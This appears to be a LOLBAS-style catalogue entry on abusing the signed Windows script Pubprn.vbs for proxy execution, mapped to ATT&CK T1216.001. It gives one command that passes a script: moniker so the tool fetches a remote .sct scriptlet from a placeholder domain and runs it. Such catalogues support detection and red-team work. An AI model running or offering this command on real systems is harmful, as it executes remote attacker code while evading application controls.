.. /Pubprn.vbs
Star

Execute

Proxy execution with Pubprn.vbs


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection

    pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
    Use case
    Proxy execution
    Privileges required
    User
    Operating systems
    Windows 10
    ATT&CK® technique
    T1216.001